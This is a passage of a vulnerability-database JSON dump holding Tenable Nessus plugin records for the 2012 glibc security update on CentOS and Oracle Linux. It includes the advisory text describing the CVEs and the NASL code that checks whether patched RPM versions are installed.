script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/01\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-devel-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:46:41", "description": "From Red Hat Security Advisory 2012:0125 :\n\nUpdated glibc packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. 
Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. 
(CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nThis update also fixes the following bug :\n\n* When using an nscd package that is a different version than the\nglibc package, the nscd service could fail to start. This update makes\nthe nscd package require a specific glibc version to prevent this\nproblem. 
(BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "edition": 22, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 : glibc (ELSA-2012-0125)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:nscd", "p-cpe:/a:oracle:linux:nptl-devel", "p-cpe:/a:oracle:linux:glibc-profile", "p-cpe:/a:oracle:linux:glibc-devel", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc"], "id": "ORACLELINUX_ELSA-2012-0125.NASL", "href": "https://www.tenable.com/plugins/nessus/68455", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0125 and \n# Oracle Linux Security Advisory ELSA-2012-0125 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68455);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\", \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46563, 46740, 47370, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0125\");\n\n script_name(english:\"Oracle Linux 4 : glibc (ELSA-2012-0125)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n 
attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0125 :\n\nUpdated glibc packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. 
If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. 
The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nThis update also fixes the following bug :\n\n* When using an nscd package that is a different version than the\nglibc package, the nscd service could fail to start. This update makes\nthe nscd package require a specific glibc version to prevent this\nproblem. (BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-February/002604.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nptl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2012/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"glibc-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-common-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-headers-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-profile-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-utils-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"nptl-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"nscd-2.3.4-2.57\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-profile / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:27:30", "description": "Updated glibc packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. 
Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). 
If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nThis update also fixes the following bug :\n\n* When using an nscd package that is a different version than the\nglibc package, the nscd service could fail to start. 
This update makes\nthe nscd package require a specific glibc version to prevent this\nproblem. (BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "edition": 25, "published": "2012-02-14T00:00:00", "title": "CentOS 4 : glibc (CESA-2012:0125)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2012-02-14T00:00:00", "cpe": ["p-cpe:/a:centos:centos:glibc-common", "p-cpe:/a:centos:centos:nscd", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:glibc-utils", "p-cpe:/a:centos:centos:glibc-devel", "p-cpe:/a:centos:centos:glibc-profile", "p-cpe:/a:centos:centos:glibc-headers", "p-cpe:/a:centos:centos:glibc", "p-cpe:/a:centos:centos:nptl-devel"], "id": "CENTOS_RHSA-2012-0125.NASL", "href": "https://www.tenable.com/plugins/nessus/57923", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0125 and \n# CentOS Errata and Security Advisory 2012:0125 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57923);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\", \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46563, 46740, 47370, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0125\");\n\n script_name(english:\"CentOS 4 : glibc (CESA-2012:0125)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or 
more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. 
If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. 
The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nThis update also fixes the following bug :\n\n* When using an nscd package that is a different version than the\nglibc package, the nscd service could fail to start. This update makes\nthe nscd package require a specific glibc version to prevent this\nproblem. (BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-February/018427.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?04137bde\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-0296\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nptl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"glibc-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"glibc-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"glibc-common-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"glibc-common-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"glibc-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"glibc-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"glibc-headers-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"glibc-headers-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"glibc-profile-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"glibc-profile-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"glibc-utils-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"glibc-utils-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"nptl-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"nptl-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"nscd-2.3.4-2.57\")) 